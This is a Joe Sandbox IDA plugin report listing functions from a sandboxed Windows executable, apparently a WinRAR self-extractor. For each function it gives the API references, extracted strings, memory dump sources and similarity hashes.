API String ID: 2565136772-3242537097
Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction ID: 3bb1567074ff2b236e2b91aa358205b4d990c4dd7d7aebd5c62ccf28f1da100b
Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction Fuzzy Hash: 16212E74A19E0385FA94BB15FC551B6E3B0AF457A0FD58434CD0E03AA4EF3CA48DA320

Function 00007FF716126A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161270A6

Part of subcall function 00007FF716112004: std::_Xinvalid_argument.LIBCPMT ref: 00007FF71611200F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161270B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161270B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161270C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161270D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161270DC

Strings

UNC, xrefs: 00007FF716126BBF
DXGIDebug.dll, xrefs: 00007FF716126A18
\\?\, xrefs: 00007FF716126A57, 00007FF716126A66

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: DXGIDebug.dll$UNC$\\?\
API String ID: 4097890229-4048004291
Opcode ID: fb1ac769355281392679e6cccb69878fe575312718547a0a82cc4cd56cbd4b61
Instruction ID: 3dd6d0f5ccbd7cd21bbb90e8400adcf105faa9157a82f7338c8eac92da5e0d1f
Opcode Fuzzy Hash: fb1ac769355281392679e6cccb69878fe575312718547a0a82cc4cd56cbd4b61
Instruction Fuzzy Hash: FA12C062B08E4281FB10EB65E8401BEA372EB41BA8FA04139DA5D07BE9DF3DD54DD354

Function 00007FF71613A440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71611129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716111396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613A72F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613A735
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613A73B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613A741
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613A747
EndDialog.USER32 ref: 00007FF71613A7BA

Strings

GETPASSWORD1, xrefs: 00007FF71613A773
Software\WinRAR SFX, xrefs: 00007FF71613A52B, 00007FF71613A53A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 431506467-1315819833
Opcode ID: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
Instruction ID: 31d839f60718d1d85f4b64a4b156bc9e080ad507b28b8d06f11540fc7e302543
Opcode Fuzzy Hash: 492748e4b920a0caf0e9a60e4b7f93ee9a00f1d6e92b46c97eb4ea70364b9bd5
Instruction Fuzzy Hash: E1B193A3F19B8285FB00AB64E8442BEA372AB453B4F904235DE5D27AD9DF3C9449D350

Function 00007FF71614E650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF71614E7CD

Strings

NAN(SNAN), xrefs: 00007FF71614E6E5
inf, xrefs: 00007FF71614E6D6
INF, xrefs: 00007FF71614E6C3
nan(snan), xrefs: 00007FF71614E6F0
NAN, xrefs: 00007FF71614E6B1
NAN(IND), xrefs: 00007FF71614E6FB
nan(ind), xrefs: 00007FF71614E706
nan, xrefs: 00007FF71614E6B8

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction ID: 114fb2661d217e82ddeced17b0bfdb0a6ccb0b5e4d65374038bc8da3b3bb931d
Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction Fuzzy Hash: 9D419D72A09F4589FB00DF25F8417EAB3A4EB193A8F80423ADE4C03B54EE38D029D354

Function 00007FF71613F390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF71613F3CF
GetClassNameW.USER32 ref: 00007FF71613F3FC
GetWindowLongPtrW.USER32 ref: 00007FF71613F41D
IsDlgButtonChecked.USER32 ref: 00007FF71613F437
GetObjectW.GDI32 ref: 00007FF71613F452
IsDlgButtonChecked.USER32 ref: 00007FF71613F487
DeleteObject.GDI32 ref: 00007FF71613F490
GetWindow.USER32 ref: 00007FF71613F49E

Strings

STATIC, xrefs: 00007FF71613F402

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Window$ButtonCheckedObject$ClassDeleteLongName
String ID: STATIC
API String ID: 781704138-1882779555
Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction ID: 9c485280b74869463a722ee89d5f99465869b34381ec6bf394a41a87de9c1651
Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction Fuzzy Hash: 59317225B08E4246FA60FB16BD547BBA3A1BB89BB4F844430DD4E07B55DE3CD80A9760

Function 00007FF716136E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF716137E9B), ref: 00007FF716137080
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71613717B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716137181
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716137187

Strings

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF716136ED5, 00007FF716136EE4
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF716136F2C, 00007FF716136F3B
</html>, xrefs: 00007FF716136F72, 00007FF716136F81
<html>, xrefs: 00007FF716136F13

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2721297748-1533471033
Opcode ID: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
Instruction ID: b37cc863072cee8863aad8cb3f4fcd4f35d39dc269d2647d074feeb83ccdbdd8
Opcode Fuzzy Hash: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
Instruction Fuzzy Hash: A581BE62B18E4285FB00EBA5E8501FEA372AB457B4F804531DE1E1769AEF38D50ED364

Function 00007FF71613AE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF71613AEAE

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Item$Text
String ID: LICENSEDLG
API String ID: 1601838975-2177901306
Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction ID: b90d93e0e118435a868af1a21e4852806334379815e8fe4e097faccac5cb1095
Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction Fuzzy Hash: 39416F25E08E5282FB54AB15FC5477BA3A1AB84BB4F944035DD0E07BA4CF7CE94DA324

Function 00007FF71612B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF71612BA12
GetProcAddress.KERNEL32 ref: 00007FF71612BA2D
GetCurrentProcessId.KERNEL32 ref: 00007FF71612BACA

Part of subcall function 00007FF71612DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF71612DDDF

Strings

CryptUnprotectMemory, xrefs: 00007FF71612BA1F
Crypt32.dll, xrefs: 00007FF71612B9F0
CryptUnprotectMemory failed, xrefs: 00007FF71612BAC1
CryptProtectMemory failed, xrefs: 00007FF71612BA80
CryptProtectMemory, xrefs: 00007FF71612BA08

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
Instruction ID: 481db7f23ef0f799ba46e5a4c2b3acf78eb3e297d27e874ca05824e3156d7eb8
Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
Instruction Fuzzy Hash: 26313620A09F5680FA14AB15BC90177E3A2BF45BB4F958139CC5E433A9DF3CE949A320

Function 00007FF7161387D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716138DB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716138DC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716138DCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716138DDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716138DE0

Strings

, xrefs: 00007FF7161388BE
, xrefs: 00007FF716138A55

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $
API String ID: 3668304517-227171996
Opcode ID: 23d63e10c4511c2d18e00504b5dad66297b05e15860e9ed8e5673f5f7533ff79
Instruction ID: f6a596e765f1bff88fcbac9055c77c421eae2df69dda72500acc7811f5297459
Opcode Fuzzy Hash: 23d63e10c4511c2d18e00504b5dad66297b05e15860e9ed8e5673f5f7533ff79
Instruction Fuzzy Hash: F9F1E562F15F4680FE40AB65E8441BEA362AB44BB8F915231CE1E177D9DF7CE188D360

Function 00007FF7161457EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF71614598A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF716145CAD
abort.LIBCMT ref: 00007FF716145CE1

Strings

csm, xrefs: 00007FF7161459B1
csm, xrefs: 00007FF716145933
csm, xrefs: 00007FF7161458D1

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction ID: 66aea74b7acc8adea111ea663495a18835cbd92b260f0c15e21987f345aac0f1
Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction Fuzzy Hash: 1DE1C572908B828AF710AF35E8803AEB7A0FB45768F944135DA4C47B55EF38E489E710

Function 00007FF716124F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF716124E24: SysAllocString.OLEAUT32 ref: 00007FF716124E5F

VariantClear.OLEAUT32 ref: 00007FF716125125

Strings

ROOT\CIMV2, xrefs: 00007FF716124F7B
Windows 10, xrefs: 00007FF71612510A
Name, xrefs: 00007FF7161250F9
WQL, xrefs: 00007FF71612502A
SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF716125017

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AllocClearStringVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 1959693985-3505469590
Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction ID: 5e0a86f247350d99af437a08f824f236cae64605fa6945793330c949055a0f59
Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
Instruction Fuzzy Hash: 91713B36A14E15C5FB10DF29EC805AAB7B1FB89BA8B915136DE4E43B68CF38D548D310

Function 00007FF7161472EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF716147371
GetLastError.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF71614737F
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF7161473A9
FreeLibrary.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF7161473EF
GetProcAddress.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF7161473FB

Strings

api-ms-, xrefs: 00007FF716147391

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction ID: ca20ffd78f3629f65c0e5b4b146132715e13200dccd14a13c2b16e128d9fed6c
Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction Fuzzy Hash: 4F318C21B1AE4281FE51FB16BC00676A2A4FF08BB0F994535DD1D4B394EF3CE0499720

Function 00007FF716141604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF71614162B
GetProcAddress.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF716141648
GetProcAddress.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF716141664

Strings

ReleaseSRWLockExclusive, xrefs: 00007FF716141653
AcquireSRWLockExclusive, xrefs: 00007FF71614163E
KERNEL32.DLL, xrefs: 00007FF716141624

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
